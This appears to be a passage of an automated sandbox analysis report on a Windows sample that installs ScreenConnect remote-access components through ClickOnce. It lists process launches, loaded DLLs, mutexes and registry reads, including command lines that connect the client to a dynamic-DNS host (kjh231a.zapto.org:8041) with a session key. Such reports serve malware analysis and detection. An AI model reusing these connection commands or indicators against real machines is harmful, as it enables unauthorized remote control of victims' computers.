                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | Mutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7608
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Command line argument: dfshim (0_2_00BB1000)
                  Source: 96r3GgxntQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 96r3GgxntQ.exe | ReversingLabs: Detection: 23%
                  Source: unknown | Process created: C:\Users\user\Desktop\96r3GgxntQ.exe "C:\Users\user\Desktop\96r3GgxntQ.exe"
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                  Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Process created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe
                  Section loaded: apphelp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dfshim.dll, version.dll, mscoree.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                  Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sxs.dll, windows.storage.dll, wldp.dll, profapi.dll, uxtheme.dll, dfshim.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, sspicli.dll, wininet.dll, dwrite.dll, ondemandconnroutehelper.dll, winnsi.dll, textshaping.dll, windowscodecs.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, propsys.dll, userenv.dll, dpapi.dll, cryptnet.dll, webio.dll, cabinet.dll, uiautomationcore.dll, apphelp.dll
                  Source: C:\Windows\System32\svchost.exe
                  Section loaded: wersvc.dll, windowsperformancerecordercontrol.dll, weretw.dll, xmllite.dll, wldp.dll, wer.dll, policymanager.dll, msvcp110_win.dll, faultrep.dll, dbghelp.dll, dbgcore.dll, wer.dll, policymanager.dll, msvcp110_win.dll, userenv.dll, profapi.dll, sspicli.dll, policymanager.dll, msvcp110_win.dll, kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll, kernel.appcore.dll, wlidsvc.dll, ncrypt.dll, cryptsp.dll, profapi.dll, clipc.dll, cryptsp.dll, dpapi.dll, ntasn1.dll, wldp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, msxml6.dll, msasn1.dll, winhttp.dll, netprofm.dll, iphlpapi.dll, policymanager.dll, msvcp110_win.dll, wtsapi32.dll, winsta.dll, gamestreamingext.dll, msauserext.dll, tbs.dll, npmproxy.dll, ondemandconnroutehelper.dll, sspicli.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, gpapi.dll, cryptnet.dll, ncryptsslp.dll, cryptngc.dll, devobj.dll, ncryptprov.dll, elscore.dll, elstrans.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                  Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, dfshim.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                  Section loaded: apphelp.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 96r3GgxntQ.exe Static PE information: certificate valid
                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
